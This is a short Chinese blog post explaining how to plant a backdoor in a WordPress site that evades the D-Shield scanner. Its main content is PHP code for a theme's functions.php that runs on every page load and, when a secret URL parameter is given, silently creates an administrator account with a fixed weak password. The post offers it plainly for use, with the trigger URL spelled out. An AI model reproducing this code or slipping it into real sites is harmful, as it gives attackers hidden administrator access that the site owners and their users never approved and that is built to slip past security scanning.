A-A+

wordpress 如何留D盾免杀后门

2021年01月12日 16:09 学习笔记 暂无评论 阅读 218 views 次

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

其实主要是通过https://www.52pojie.cn/thread-1084019-1-1.html 这篇文章给予的启发。

只需要在模板文件functions.php中加入后门代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
    if (
        md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b'
    ) {
        require('wp-includes/registration.php');
        if (!username_exists('backdoor')) {
            $user_id = wp_create_user('backdoor', '123456');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}

使用http(s)://你的域名/?backdoor=go访问,
自动创建用户名为backdoor密码为123456的管理员账户

布施恩德可便相知重

微信扫一扫打赏

支付宝扫一扫打赏

×

给我留言